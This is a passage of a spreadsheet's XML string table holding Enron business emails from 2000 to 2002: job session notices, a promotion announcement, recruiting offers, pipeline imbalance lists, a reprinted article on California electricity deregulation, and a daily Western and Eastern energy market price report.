http://www.cmta.net/member/etpmrktg.shtml to see how you might be_x000D_
able to take advantage of these services.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lillian.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Newco</t>
  </si>
  <si>
    <t>Lillian, I forgot to add that the slate of directors and officers for _x000D_
Capacity Management Corp. will be identical to that of Transwestern Pipeline _x000D_
Company.,</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 02:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Portland Job Opportunities</t>
  </si>
  <si>
    <t xml:space="preserve">JUST A REMINDER ABOUT THE BELOW INFO SESSIONS FOR TODAY!!!!!_x000D_
---------------------- Forwarded by Amy FitzPatrick/PDX/ECT on 03/23/2001 _x000D_
12:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Amy FitzPatrick_x000D_
03/22/2001 02:47 PM_x000D_
To: Portland West Desk_x000D_
cc:  _x000D_
Subject: Portland Job Opportunities_x000D_
_x000D_
Listed below are several positions which may become available over the next _x000D_
several months in the Portland office.  We will be holding information _x000D_
sessions on Friday, 3/23 in Mt Hood.  Listed below are details regarding the _x000D_
time of the information session, position, department and hiring manager._x000D_
_x000D_
Time Position   Department   Hiring Manager_x000D_
10:00 Senior Specialist  Fundamentals Analysis  Tim Heizenrader_x000D_
10:30 Specialist/Analyst  Real Time   Bill Williams III_x000D_
11:00 Specialist/Senior Specialist Volume Management  Chris Stokley_x000D_
12:00   Research Analyst  Renewable Power Desk Elliot Mainzer_x000D_
2:30  Power Prescheduler  Scheduling   Cara Semperger_x000D_
_x000D_
Please feel free to attend any of these sessions to learn more about the _x000D_
available opportunities. _x000D_
_x000D_
Attached are more detailed descriptions of the above mentioned positions.  We _x000D_
will be considering internal candidates as well as external candidates for _x000D_
the above positions.  If you are interested, please let Amy FitzPatrick know _x000D_
no later than close of business Wednesday, March 28, 2001._x000D_
_x000D_
_x000D_
_x000D_
        _x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 11:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Paul Quilkey</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Richard.  I was just wondering if you sent this to me because of my recent _x000D_
inquiry to Joe re: personnel profiles for power marketing/trading folks for _x000D_
our Australia efforts?  thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Richard Ingersoll@ECT_x000D_
02/19/2000 08:52 PM_x000D_
To: Rebecca A. McDonald@ENRON_x000D_
cc: All Enron Worldwide@ENRON _x000D_
_x000D_
Subject: Re: Paul Quilkey  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca A. McDonald @ ENRON                           02/18/2000 05:51 _x000D_
PM_x000D_
	_x000D_
_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: All Enron Worldwide_x000D_
cc:  _x000D_
Subject: Paul Quilkey_x000D_
_x000D_
Please join me in congratulating Paul Quilkey in his new role as Vice _x000D_
President leading our efforts in Australia.  Joe Hirl has assumed a leading _x000D_
role in the formation of our business in Japan.  Joe also has regional _x000D_
responsibility for trading activity._x000D_
_x000D_
Paul's appointment is in recognition of the critical role Paul has played in _x000D_
Enron Australia's successful commencement and the body of outstanding work he _x000D_
has accumulated to date in his career with Enron. It is worth noting that _x000D_
Paul joined Enron as recently as the Associate intake of 1995.  In the short _x000D_
time since then Paul has developed and grown through various positions to his _x000D_
current Trading and Origination role, a position of great responsibility in a _x000D_
dynamic young business making aggressive inroads into the Australian market, _x000D_
and far from Enron's traditional US markets. _x000D_
_x000D_
Please join me in congratulating Paul on his appointment. _x000D_
_x000D_
Rebecca_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 07:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RESULTS OF SUPER SATURDAY - RICE MBA</t>
  </si>
  <si>
    <t xml:space="preserve">Please get the list of people I interviewed (and their resumes) from Allison _x000D_
Bailey and confirm with her that if the attached spreadsheet shows a "y" next _x000D_
to their name that means they received an offer (if "n" then no offer).  I _x000D_
would like to email those i interviewed who recieved offers_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 10/30/2000 03:54 PM -----_x000D_
_x000D_
	Mary Alison Bailey@ECT_x000D_
	10/30/2000 03:20 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Mark Courtney/HOU/ECT@ECT, Traci _x000D_
Warner/Enron Communications@Enron Communications, Scott Porter/HOU/EES@EES, _x000D_
Bernie Barcio/Enron Communications@Enron Communications, Andrew _x000D_
Wilson/Corp/Enron@ENRON, Bill Windle/Corp/Enron@Enron, Brian Spector/Enron _x000D_
Communications@Enron Communications, Kate Fraser/HOU/ECT@ECT, Pushkar _x000D_
Shahi/HOU/ECT@ECT, Waymon Votaw/NA/Enron@Enron, Patrick Wade/HOU/ECT@ECT, _x000D_
David Dye/HOU/EES@EES, Jon Adler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Greg _x000D_
Characklis/HOU/AZURIX@AZURIX, William Kendrick/OTS/Enron@ENRON, Larry _x000D_
Leib/Corp/Enron@Enron, Andrew Miles/NA/Enron@Enron, Stephen Stenhouse/Enron _x000D_
Communications@Enron Communications, Trevor Randolph/Corp/Enron@ENRON, _x000D_
Charles Varnell/NA/Enron@Enron, Doug Sewell/HOU/ECT@ECT, Alhamd _x000D_
Alkhayat/NA/Enron@ENRON, Micha Makowsky/Enron Communications@Enron _x000D_
Communications, Frank Bay/Enron Communications@Enron Communications, Jaime _x000D_
Gualy/Enron Communications@Enron Communications, John Wilson/NA/Enron@ENRON, _x000D_
John Walt/Corp/Enron@ENRON, Kelli Little/NA/Enron@Enron, Patrick _x000D_
Wade/HOU/ECT@ECT, Michelle Juden/HOU/EES@EES, Aamir Maniar/NA/Enron@Enron, _x000D_
Doug Sewell/HOU/ECT@ECT, Brian O'Rourke/Enron Communications@Enron _x000D_
Communications, David Maskell/Enron Communications@Enron Communications, _x000D_
Michelle D Cisneros/HOU/ECT@ECT, John Kiani/HOU/EES@EES, _x000D_
Marilyn_baker@enron.net_x000D_
		 cc: _x000D_
		 Subject: RESULTS OF SUPER SATURDAY - RICE MBA_x000D_
_x000D_
Please call or e-mail candidates who have received "offers".All of your hard _x000D_
work paid off - you have a great list of "offers".  These students have all _x000D_
been called and will receive a letter/packet by the end of the week._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 01:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>JP Morgan Securities Inc.</t>
  </si>
  <si>
    <t>Regarding Aneela's request for execution of an "Electronic Order Execution _x000D_
Agreement", please send your usual message to Ted Murphy, Bill Bradford, _x000D_
etc.  The agreement is drafted for execution by Enron Corp.  Please identify _x000D_
the Enron trading signatory(ies).  Thanks.  Sara</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 11:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Utilities, Electric: Deregulation: Consumer Outrage in California</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Miyung Buster/ENRON_DEVELOPMENT on 09/29/2000 06:01 PM _x000D_
-----_x000D_
_x000D_
	djcustomclips@djinteractive.com_x000D_
	09/27/2000 02:31 PM_x000D_
	Please respond to nobody_x000D_
		 _x000D_
		 To: 86464@WCTOPICS.djnr.com_x000D_
		 cc: _x000D_
		 Subject: Utilities, Electric: Deregulation: Consumer Outrage in California_x000D_
_x000D_
_x000D_
 _x000D_
Consumer Outrage in California _x000D_
Al Senia _x000D_
? _x000D_
09/30/2000 _x000D_
Utility Business _x000D_
Copyright 2000 by Intertec Publishing Corporation, a PRIMEDIA Company. All _x000D_
rights reserved. _x000D_
_x000D_
Sempra sits on the hot seat as California rides out the effects of its _x000D_
efforts at deregulation._x000D_
_x000D_
Wild fires have swept the western United States this year, but they are _x000D_
nothing like the fire storm over energy deregulation that has engulfed San _x000D_
Diego's Sempra Energy. By a quirk of business fate, the 1.2 million customers _x000D_
of Sempra's San Diego Gas&amp;Electric division in July became the first to _x000D_
experience fully deregulated electricity rates in California. Electricity _x000D_
bills instantly doubled and tripled. The expectation was that deregulation _x000D_
would cause prices to drop, not spike. The resultant outcry threatens to _x000D_
derail the state's fledgling deregulation program and shape the future of _x000D_
deregulation nationally. It also situates Sempra squarely on the hot seat at _x000D_
a time when its profits are on the rise. _x000D_
_x000D_
Does Sempra deserve to be in this position? Like many other deregulated _x000D_
utilities around the nation, Sempra is in the midst of transforming itself _x000D_
from a regulated utility business (SDG&amp;E) to a broad-based energy company _x000D_
that offers a variety of value-added services. Under the direction of Sempra _x000D_
President and Chief Executive Officer Stephen L. Baum, that process has been _x000D_
especially robust. The company has launched a number of domestic and _x000D_
international strategic initiatives designed to accelerate earnings growth by _x000D_
an average of 8 percent to 10 percent annually and generate at least _x000D_
one-third of the earnings from unregulated businesses by 2003._x000D_
_x000D_
Baum, who became chairman this month, intends to change the focus of Sempra's _x000D_
overall business to cope with deregulation. He wants to further diversify the _x000D_
company, create a strong retail energy business, pursue selective _x000D_
international investments and capitalize on emerging technologies. "I want _x000D_
the company...to have a large and diverse customer base nationwide and _x000D_
worldwide in which we're moving from an asset-intensive business to a _x000D_
customer- and products- and risk-management-intensive business," says Baum._x000D_
_x000D_
So far, the strategy seems to be working - maybe a little too well. Profits _x000D_
soared 34 percent in the second quarter from $82 million last year to $110 _x000D_
million this year. One big contributor was the Sempra Energy trading _x000D_
subsidiary, which deals in electricity, natural gas and oil. Its profit _x000D_
soared in the second quarter this year to $40 million from $3 million in _x000D_
1999. So far, so good, but the rosy revenues and profit propelled Sempra's _x000D_
San Diego Gas&amp;Electric to become the first utility in the state to pay off _x000D_
all its bonds floated to pay for "stranded costs." These are expenses (such _x000D_
as past massive nuclear power plant investments) incurred in the previously _x000D_
regulated market that may not be fully recoverable in a competitive market. _x000D_
Those bond payoffs triggered the full force of the free market, since the _x000D_
artificial price caps on electricity prices, which were put into place as a _x000D_
transitional arrangement by the state legislature to make deregulation _x000D_
politically palatable, automatically expired with the bonds. Since _x000D_
California's deregulation law required the state's utilities to sell off _x000D_
their generation businesses and stick to delivering energy, SDGOnow buys its _x000D_
power in an open market through the California Power Exchange. That _x000D_
arrangement tends to favor large businesses that can more easily shop for _x000D_
their electricity supplies. With the bonds paid off, the Sempra division now _x000D_
passes the full cost of that power to its customers (California's other _x000D_
utilities are not expected to reach this point until 2002). And with the _x000D_
demand for power rising in the state while supplies fall short, the cost for _x000D_
Sempra customers is up. Way up. SDGOis paying as much as 10 times the regular _x000D_
cost for electricity every time a summer heat wave hits._x000D_
_x000D_
Through its success, Sempra pushed the door open into a pure, deregulated _x000D_
market nearly two years before anyone in California expected it. What _x000D_
industry executives, politicians, consumer advocates and ratepayers quickly _x000D_
discovered is that energy demand is rising, there aren't enough power plants _x000D_
to meet demand and prices are skyrocketing. Even with the higher prices, _x000D_
there may not be enough electricity to go around. So during hot spells, _x000D_
rolling one-hour energy blackouts throughout the state became a possibility _x000D_
for the first time since World War II. Sempra claims it's merely following _x000D_
the state's deregulation orders, but consumer advocates are outraged that the _x000D_
parent company (through its trading subsidiary) benefits from energy price _x000D_
volatility. They want some of the company profits to go back to SDGOto lower _x000D_
customer utility bills._x000D_
_x000D_
That isn't Sempra's (and the other state utility holding companies') only _x000D_
problem. Bill-burning protests are being organized in downtown San Diego. San _x000D_
Diego Mayor Susan Goldberg wants the state attorney general to probe whether _x000D_
there has been "collusion, price fixing or any other inappropriate behavior _x000D_
in the market price of electricity." The state legislature is being asked to _x000D_
consider reversing or postponing the deregulation effort. Some legislators _x000D_
have launched an effort to roll back utility rates. The architect of the _x000D_
deregulation law is under fire for alleged close ties to the utility _x000D_
companies. State Public Utility Commission member Carl Wood calls _x000D_
deregulation a mistake and accuses unnamed power players of profiteering at _x000D_
the consumer's expense._x000D_
_x000D_
Even California Gov. Gray Davis has gotten critical. "Californians are _x000D_
willing to pay their fair share of the cost for a reliable supply of _x000D_
electricity, but I believe the current situation is unjust and totally _x000D_
unacceptable," Davis says. He successfully pushed the Federal Energy _x000D_
Regulatory Commission to investigate wholesale energy prices in the western _x000D_
United States, believing it would lead to short-term federal price controls. _x000D_
The governor also proposed a plan in mid-August to the Public Utility _x000D_
Commission that would average consumers' bills over a 12-month period to make _x000D_
monthly statements predictable. He says deregulation can work, but not until _x000D_
supply and demand come into balance and "until electricity generators act _x000D_
responsibly." It's no wonder Davis wants the feds involved - the state _x000D_
doesn't have much power over power anymore now that deregulation has become _x000D_
state law._x000D_
_x000D_
Despite Davis' hopes, a supply balance isn't likely to return to California _x000D_
anytime soon. The state's last major power plant, a nuclear facility at _x000D_
Diablo Canyon, went online 15 years ago. Since then, the state's population _x000D_
has grown by 8 million, and 3.5 million new jobs have been created. Four new _x000D_
plants are under construction, but that isn't enough to meet escalating _x000D_
demand, and the first plant won't come online for a year. Meanwhile, market _x000D_
uncertainty - and increasing calls for reregulation - aren't doing much to _x000D_
attract new power plant investment. Reliant Energy Inc., for example, has _x000D_
backed off a plan to build a plant in Barstow, Calif. Calpine Corp. wants to _x000D_
build a power plant in San Jose, the center of Silicon Valley, but the effort _x000D_
is strongly opposed by local businesses and residents. A 700-megawatt plant _x000D_
proposed for a desert area is mired down in a regulatory morass. However, _x000D_
Duke Energy North America, which purchased several state power plants in _x000D_
1998, expects to invest more than $1 billion to build and expand power plants _x000D_
in California over the next four years._x000D_
_x000D_
Sempra's Plans Sempra has its own view of the escalating imbroglio. Baum _x000D_
wants the Federal Energy Regulatory Commission to determine if the power _x000D_
market is being manipulated and then step in if necessary and set wholesale _x000D_
energy prices. He also believes utilities, with Public Utility Commission _x000D_
approval, should install time-of-use meters throughout the state so customers _x000D_
could control their own power load. Baum also suggests that the Public _x000D_
Utility Commission allow SDGOto purchase futures contracts for its customers. _x000D_
Baum wants the authority to aggregate SDGOcustomers (if they choose) into one _x000D_
"market" to get a better price. Meanwhile, he's hoping the controversy won't _x000D_
derail Sempra's business plans._x000D_
_x000D_
These plans include six strategic directions: expanding the retail energy _x000D_
services business; exporting its traditional utility experience overseas; _x000D_
boosting the energy trading business; selectively developing supporting _x000D_
generation; capitalizing on emerging technologies like the Internet and the _x000D_
applications services business; and focusing the core utility company on _x000D_
energy delivery._x000D_
_x000D_
Baum intends to spend $4 billion in capital investment during the next four _x000D_
years with delivery services getting half that amount and the international _x000D_
and retail operations equally splitting another $1.5 billion. Baum estimates _x000D_
Sempra's energy trading business will bring in $40 million to $55 million in _x000D_
profit by 2003. It's already well ahead of that pace for this year, but the _x000D_
business is highly volatile. International operations will generate another _x000D_
$40 million to $60 million in annual profit in four years. Sempra's retail _x000D_
energy business, operated as Sempra Energy Solutions, will generate between _x000D_
$30 million and $70 million, he estimates. "Ultimately, I think the big _x000D_
opportunity in the utility business we are in lies with this industrial, _x000D_
commercial residential mass market and the products and services _x000D_
business,"Baum says._x000D_
_x000D_
International operations look to be another key strategic area for Sempra, in _x000D_
part due to the company's location near the Mexico border. It has made _x000D_
significant natural gas investments in northern Mexico. The division _x000D_
develops, owns and operates energy projects and provides natural gas and _x000D_
electricity energy services for 2.5 million customers in Argentina, Canada, _x000D_
Chile, Mexico, Peru and Uruguay. Baum says it is pursuing new opportunities _x000D_
in Latin America. "International is a much more traditional utility business _x000D_
(than other new businesses Sempra is getting into)," Baum says. "We look to _x000D_
(invest in) areas with a high rate of growth, 6 percent or more, in stable _x000D_
economies. We think those are good investments. We have more than $1 billion _x000D_
invested internationally, usually in partnerships."_x000D_
_x000D_
Some analysts view the international business as inherently risky given the _x000D_
possibility of political and economic change. Baum disagrees. "We think on a _x000D_
risk-adjusted basis this is a good, solid, growing business," he says. "All _x000D_
our (international) businesses are making money. We are not in a loss _x000D_
condition in any of our international operations. They make their expected _x000D_
returns and their cash flow. It's the kind of business we have done for _x000D_
years."_x000D_
_x000D_
Baum is optimistic that the new Sempra can deliver strong performance as it _x000D_
refocuses on a deregulated world.  Analysts seem pleased. "They have a _x000D_
well-developed, well thought-out strategy," says David Maccarone, vice _x000D_
president of New York-based Goldman Sachs&amp;Co. "The latest financial _x000D_
performance is impressive." Maccarone adds that the trading business is _x000D_
benefiting from "highly favorable market conditions that are not _x000D_
sustainable." Overall, the international business is doing well. The only _x000D_
dark cloud? The aftermath of California deregulation. "There's an uncertain _x000D_
regulatory climate in California," he says. "It's never been regarded as a _x000D_
favorable state to do business in from a utility perspective. Still, I'm _x000D_
optimistic there won't be a substantial negative impact."_x000D_
_x000D_
Meanwhile, the controversy is bringing back bad memories. In the 1970s, _x000D_
before Sempra existed, SDGOwas notorious for high rates. The utility was so _x000D_
unpopular that officials painted over the company logo on its truck fleet. _x000D_
Baum is trying to stop that from happening again. Maccarone believes Sempra _x000D_
is a victim of its own success. "They recovered their liability faster than _x000D_
other California utilities," he says. "Now they are getting branded for it." _x000D_
_x000D_
Folder Name: Utilities, Electric: Deregulation _x000D_
Relevance Score on Scale of 100: 98_x000D_
_x000D_
______________________________________________________________________ _x000D_
To review or revise your folder, visit Dow Jones CustomClipsor contact Dow _x000D_
Jones Customer  Service by e-mail at custom.news@bis.dowjones.comor by phone _x000D_
at 800-369-7466. (Outside the U.S. and  Canada, call 609-452-1511 or contact _x000D_
your local sales representative.) _x000D_
______________________________________________________________________ _x000D_
Copyright (c) 2000 Dow Jones &amp;Company, Inc. All Rights Reserved </t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'richard.hanagriff@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'cynthia.rivers@enron.com', 'lynn.blair@enron.com', 'rick.dietz@enron.com', 'lorraine.lindberg@enron.com', 'tk.lohman@enron.com', 'kevin.hyatt@enron.com', 'john.buchanan@enron.com', 'amy.mulligan@enron.com', 'linda.ward@enron.com', 'albert.hernandez@enron.com', 'michelle.lokay@enron.com', 'darrell.schoolcraft@enron.com', 'morgan.gottsponer@enron.com', 'terry.kowalke@enron.com'})</t>
  </si>
  <si>
    <t>TW imbalances 12/11</t>
  </si>
  <si>
    <t xml:space="preserve">Receivable balances needing attention:_x000D_
El Paso_x000D_
PG&amp;E_x000D_
NGPL_x000D_
Mojave_x000D_
_x000D_
_x000D_
Payable balances needing attention:_x000D_
EOG_x000D_
Pan-Alberta_x000D_
Agave_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 23:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colleen.sullivan@enron.com', 'joann.collins@enron.com', 'dick.jenkins@enron.com', 'alvin.thompson@enron.com', 'scott.neal@enron.com'})</t>
  </si>
  <si>
    <t>Third Party Purchase</t>
  </si>
  <si>
    <t>Jeff Porter with New Power just informed me that they are buying "a little _x000D_
more" than 4,300 dth per day of citygate gas on CGAS.  Dick and I will be _x000D_
chatting about this later today._x000D_
_x000D_
Joann found out about this yesterday and this is the first time I've heard _x000D_
about it.</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 19:28:02 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Energy Market Report - 01/23/02</t>
  </si>
  <si>
    <t>_x000D_
Subject: Energy Market Report - 01/23/02_x000D_
_x000D_
_x000D_
Energy Market Report_x000D_
Wednesday, January 23, 2002_x000D_
_x000D_
*See attached pdf file._x000D_
___________________________________________________________x000D_
Western Pre-Scheduled Firm Electricity Prices($/MWh)_x000D_
January 23, 2002 for January 24, 2002_x000D_
_x000D_
Peak(Heavy)_x000D_
                   Low      Change     High     Change_x000D_
NW/N. Rockies     18.50      0.00     19.00      0.00_x000D_
Mid-Columbia      18.50      0.00     19.00      0.00_x000D_
COB               21.25      0.25     21.50     -0.25_x000D_
N. California     22.50      0.00     24.50      0.50_x000D_
Midway/Sylmar        NA        NA        NA        NA_x000D_
S. California     22.55      1.30     24.40      0.40_x000D_
Mead              21.00     -0.50     23.00     -1.75_x000D_
Palo Verde        19.00     -2.25     23.00     -0.50_x000D_
Inland SW         19.00     -2.25     23.75     -1.00_x000D_
4-Corners         21.25      0.75     23.00      1.00_x000D_
Central Rockies   19.50     -1.00     21.00     -0.25_x000D_
___________________________________________________________x000D_
Off-Peak(Light)_x000D_
                   Low      Change     High     Change_x000D_
NW/N. Rockies     16.25      0.25     16.75      0.25_x000D_
Mid-Columbia      16.25      0.25     16.75      0.25_x000D_
COB               16.50      0.50     17.00     -1.00_x000D_
N. California     16.50     -0.50     18.00      0.50_x000D_
Midway/Sylmar        NA        NA        NA        NA_x000D_
S. California     16.50      0.50     18.85      0.85_x000D_
Mead              15.50      1.00     19.00      3.00_x000D_
Palo Verde        14.00      0.25     16.25      0.75_x000D_
Inland SW         14.00      0.25     19.00      3.00_x000D_
4-Corners         14.75      0.75     15.50      0.50_x000D_
Central Rockies   14.00      1.00     16.00      1.00_x000D_
__________________________________________________________x000D_
Duncan Demands Immunity_x000D_
_x000D_
Day-ahead peak power prices in the Western U.S. were mostly steady for_x000D_
Thursday delivery amid weather forecasts calling for a slight increase in_x000D_
temperatures and an abundance of Northwest hydropower.  However,_x000D_
temperatures were expected to drop again beginning on Friday, which offered_x000D_
sellers a glimmer of hope for a stronger end to the month.  Additionally,_x000D_
the latest six-to-ten from the National Weather Service showed the Western_x000D_
U.S. blanketed in below-normal temperatures from January 29 through February_x000D_
2.  NYMEX Henry Hub gas futures were mixed in moderate trade Wednesday, with_x000D_
the fronts pushed down to new lows by mostly mild U.S. weather forecasts,_x000D_
and again later in the session by a bearish AGA weekly inventory report._x000D_
February Hub gas fell 3 cents to close at 2.076$/mmBtu after reaching a new_x000D_
contract low of 2.04$/mmBtu shortly after the AGA report was released._x000D_
March also hit a new low of 2.06$/mmBtu, but settled 2.9 cents lower than a_x000D_
day ago at 2.089$/mmBtu.  The AGA inventory report indicated that 124 bcf_x000D_
were taken out of storage last week, below industry estimates and the_x000D_
five-year average drop of 182 bcf.  Total U.S. inventories stood at 2.405_x000D_
tcf, 1.036 tcf, or 76% above last year.  Of the 124 bcf withdrawn, 21 were_x000D_
taken out of the Western Consuming Region.  Total Western inventories stood_x000D_
at 379 bcf, or 75 percent full.  Inventories for the same week a year ago_x000D_
were 241 bcf, and have averaged 280 bcf over the past five years.  Now for_x000D_
your daily dose of Enron.  David Duncan, the fired Andersen partner who was_x000D_
the lead auditor for Enron Corp, challenged Congress by stating via his_x000D_
attorney that he would invoke his Fifth Amendment rights and refuse to_x000D_
testify at a hearing scheduled for Thursday unless he was granted immunity._x000D_
Committee chairman Rep. Billy Tauzin said that no immunity would be granted_x000D_
Duncan without consent of the Justice Department.  "I will not provide_x000D_
immunity to anyone without consent of the Justice Department who is doing a_x000D_
criminal investigation.  I have not received such a green light to this_x000D_
date, as to whether or not they change their mind I can't say," said Tauzin_x000D_
on CNN._x000D_
_x000D_
Heavy load energy costs in the Northwest were unchanged Wednesday as_x000D_
abundant hydro supplies satiated regional heating demand.  "It's still cold,_x000D_
but we've got plenty of hydro to cushion us," said one Northwest utility_x000D_
trader.  Flow forecasts for Chief Joseph were revised higher Wednesday,_x000D_
coming in at 110 kcfs Thursday, 100 kcfs Friday, 75 kcfs Saturday, 65 kcfs_x000D_
Sunday, 105 kcfs Monday, and 100 kcfs next Tuesday and Wednesday.  There was_x000D_
no major unit news to report, but Colstrip #3 (700 MW) remained down for_x000D_
generator repairs.  According to Weather Derivatives, heating demand in the_x000D_
region was forecast to average 136% of normal through January 30, with the_x000D_
greatest demand expected early next week._x000D_
_x000D_
Amid a healthy grid and concerns that weather could be slightly warmer than_x000D_
expected later in the week, electricity prices were mostly steady in the_x000D_
Golden State on Wednesday.  "We're chasing gas and watching the extended_x000D_
forecast pretty closely, but otherwise it is a boring day," said one Western_x000D_
marketer. The heavy load product at SP15 changed hands between 22.55 and_x000D_
24.4$/MWh, with the bulk of deals done around 23.25$/MWh, while light load_x000D_
pieces were bought and sold from 16.5 to 18.85$/MWh.  In political news, the_x000D_
CPUC approved two measures necessary for SCE's return to solvency.  SCE will_x000D_
be allowed to raise $1.5 billion in bridge financing, which when combined_x000D_
with $4 billion cash on hand, will permit the bankrupt utility to pay off_x000D_
its creditors by the end of the first quarter.  Secondly, SCE will raise_x000D_
consumer rates to cover the bridge financing.  "SCE needs to pay off their_x000D_
qualifying facilities, but it will be interesting to see whether they are_x000D_
actually willing and able to pay the CalPX for power purchased on the_x000D_
exchange, and for power purchased on their behalf by CAISO last winter.  I'm_x000D_
a little skeptical, but I hope they do," commented one market analyst.  In_x000D_
unit news, gas-fired Scattergood #3 (445 MW) was off the grid on Wednesday_x000D_
for planned maintenance.  Highs for Thursday were predicted in the mid-60s_x000D_
in Los Angeles, and low-50s at mid-state load centers.  Temperatures were_x000D_
expected to remain below normal in California through Sunday.  The most_x000D_
current six-to-ten called for below-normal temperatures from January 29 to_x000D_
February 2._x000D_
_x000D_
On forecasts calling for slight warming, peak power prices in the Southwest_x000D_
traded slightly lower for Thursday delivery.  "Our overnight lows are_x000D_
supposed to climb back into the 40s beginning tonight, and that's much more_x000D_
tolerable than the 30s," said one Phoenix-based trader.  Heavy load energy_x000D_
at Palo Verde traded anywhere from 19 to 23$/MWh, though most deals went_x000D_
through around the 22$/MWh mark.  There was no significant unit news to_x000D_
report on Wednesday, but there was some talk of an upcoming maintenance_x000D_
outage.  Sources indicated that Navajo #2 (750 MW) was coming down for_x000D_
planned maintenance on February 2, and returning on February 25._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Patrick O'Neill and Jessie Norris_x000D_
__________________________________________________________x000D_
_x000D_
Western Generating Unit Outages_x000D_
_x000D_
Current                            Begins          Ends          Reason_x000D_
CAISO units &lt;250/7054 total          NA             NA_x000D_
planned/unplanned*_x000D_
Alamitos #3/320/gas               21-Jan-02         ?            planned_x000D_
Alamitos #6/480/gas               20-Jan-02         ?            planned_x000D_
Colstrip #3/700/coal              11-Jan-02         ?            repairs_x000D_
Encina #4/303/gas                 12-Jan-02         ?            unplanned_x000D_
Etiwanda #4/320/gas               21-Jan-02         ?            planned_x000D_
Four Corners #5                   09-Jan-02     14-Mar-02        maintenance_x000D_
Grand Coulee #19/600/hydro        10-Dec-01       March          repairs_x000D_
Haynes #6/341/gas                 07-Jan-02         ?            planned_x000D_
Helms PGP #2/407/hydro            01-Oct-01         ?            planned_x000D_
Hyatt/Thermalito/933/hydro        02-Oct-01         ?      @506 MW,_x000D_
unplanned_x000D_
Morro Bay #4/336/gas              21-Jan-02         ?            planned_x000D_
Moss Landing #7/739/gas           29-Dec-01         ?            planned_x000D_
Ormond Beach #1/725/gas           28-Dec-01         ?            planned_x000D_
Ormond Beach #2/750/gas           05-Oct-01         ?      @350 MW,_x000D_
unplanned_x000D_
Pittsburg #6/317/gas              22-Nov-01         ?            planned_x000D_
Pittsburg #7/682/gas              21-Jan-02         ?            unplanned_x000D_
Scattergood #3/445/gas            22-Jan-02         ?_x000D_
maintenance*_x000D_
_x000D_
Future_x000D_
Navajo #2/750/coal                02-Feb-02     25-Feb-02_x000D_
maintenance*_x000D_
_x000D_
For unit owners refer to pdf version._x000D_
*Indicates a change from previous EMR._x000D_
_______________________________________________________________________x000D_
_x000D_
Eastern Markets Pre-Scheduled Firm Power Prices ($/MWh)_x000D_
_x000D_
January 23, 2002 for January 24, 2002_x000D_
_x000D_
Peak (Heavy) in $/MWh_x000D_
                 Low     Change   High      Change_x000D_
Into Cinergy    15.50    -1.25    17.90     -0.60_x000D_
Western PJM     21.50    -0.50    21.90     -1.05_x000D_
Into Entergy    17.10    -0.60    18.00     -0.20_x000D_
Into TVA        16.00     0.00    17.50     -1.75_x000D_
ERCOT           17.10     0.10    17.90      0.30_x000D_
____________________________________________________________x000D_
Hope of an upswing in the spot electricity market was firmly squashed_x000D_
Wednesday as a bearish AGA report, incredibly warm January temperatures, and_x000D_
soft gas values plagued the market, sending day-ahead power prices mostly_x000D_
lower across the Eastern Interconnect.  Temperatures were expected anywhere_x000D_
from 11 to 20 degrees above normal in the East on Thursday.  The AGA weekly_x000D_
inventory report listed a total draw of 124 bcf, a number well below_x000D_
industry estimates of around 145 bcf.  NYMEX Henry Hub natural gas futures,_x000D_
already low, sunk further on the disappointing news coupled with the warm_x000D_
weather pattern.  February shed 3 cents to close at 2.076$/mmBtu, while the_x000D_
March contract fell 2.9 cents to end at 2.089$/mmBtu.  Both months reached_x000D_
new contract lows during the day, before rebounding somewhat prior to the_x000D_
close._x000D_
_x000D_
Heavy load energy costs slipped lower in the Mid-Atlantic on Wednesday._x000D_
"The dailies were pretty lame today, with the extremely mild temperatures_x000D_
and the soft real-time prices.  Prices were a little erratic early, on a_x000D_
possible unit outage, but demand is too weak for even a large curtailment to_x000D_
matter," summed up one PJM trader.  Market players remained uncertain as to_x000D_
which unit shut Wednesday.  Western PJM goods for Thursday delivery traded_x000D_
between 21.5 and 21.9$/MWh, while the February contract lost about 15 cents,_x000D_
trading mostly around 23.5$/MWh.  LMPs remained low on Wednesday, after_x000D_
showing a little strength around 10:00 EST, and averaging 20.68$/MWh through_x000D_
15:00 EST.  Daytime highs were expected to hit 62 degrees in D.C. on_x000D_
Thursday, while other PJM load centers also expected warm temperatures, with_x000D_
highs in the mid-50s.  The most current six-to-ten projected no relief in_x000D_
sight, as above-normal temperatures were forecast from January 29 to_x000D_
February 2._x000D_
_x000D_
Amid mild weather conditions and little else, peak electricity prices shed_x000D_
value in the Midwest on Wednesday.  Into Cinergy goods opened at the day's_x000D_
highest levels, and fell off steadily through the session, trading between_x000D_
15.5 and 17.9$/MWh.  According to traders, February was actively traded,_x000D_
